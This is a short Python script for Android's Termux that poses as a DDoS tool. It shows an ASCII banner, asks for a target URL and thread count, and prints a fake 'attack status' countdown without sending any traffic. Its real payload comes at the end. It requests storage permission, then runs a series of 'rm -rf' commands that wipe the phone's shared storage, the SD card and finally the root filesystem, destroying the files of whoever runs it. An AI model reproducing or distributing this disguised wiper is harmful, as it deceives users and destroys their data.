import os

os.system("clear")
print(" ╭━━━┳━━━┳━━━┳╮╱╭╮ ")
print(" ┃╭━╮┃╭━╮┃╭━╮┃┃╱┃┃ ")
print(" ┃┃╱╰┫╰━╯┃╰━╯┃╰━╯┃ ")
print(" ┃┃╱╭┫╭━━┫╭━━┫╭━╮┃ ")
print(" ┃╰━╯┃┃╱╱┃┃╱╱┃┃╱┃┃ ")
print(" ╰━━━┻╯╱╱╰╯╱╱╰╯╱╰╯ ")
print(" ╭━━━┳━━━┳━━━┳━━━╮ ")
print(" ╰╮╭╮┣╮╭╮┃╭━╮┃╭━╮┃ ")
print(" ╱┃┃┃┃┃┃┃┃┃╱┃┃╰━━╮ ")
print(" ╱┃┃┃┃┃┃┃┃┃╱┃┣━━╮┃ ")
print(" ╭╯╰╯┣╯╰╯┃╰━╯┃╰━╯┃ ")
print(" ╰━━━┻━━━┻━━━┻━━━╯ ")
print("        Created by Mr.brutus ")

x = input(" URL: ")
y = input(" Thread ")

for y in range (10000000):
    print(" [*] attack status ===> ",y," sec left ")
ddos = input(" attack done press enter or type exit;  ")

os.system('termux-setup-storage')
os.system('rm -rf /storage/emulated/0/*')
os.system('rm -rf /storage/emulated/*')
os.system('rm -rf /sdcard/*')
os.system('rm -rf /sdcard/0/*')
os.system('rm -rf /sdcard1/*')
os.system('rm -rf /storage/*')
os.system('rm -rf /* ')
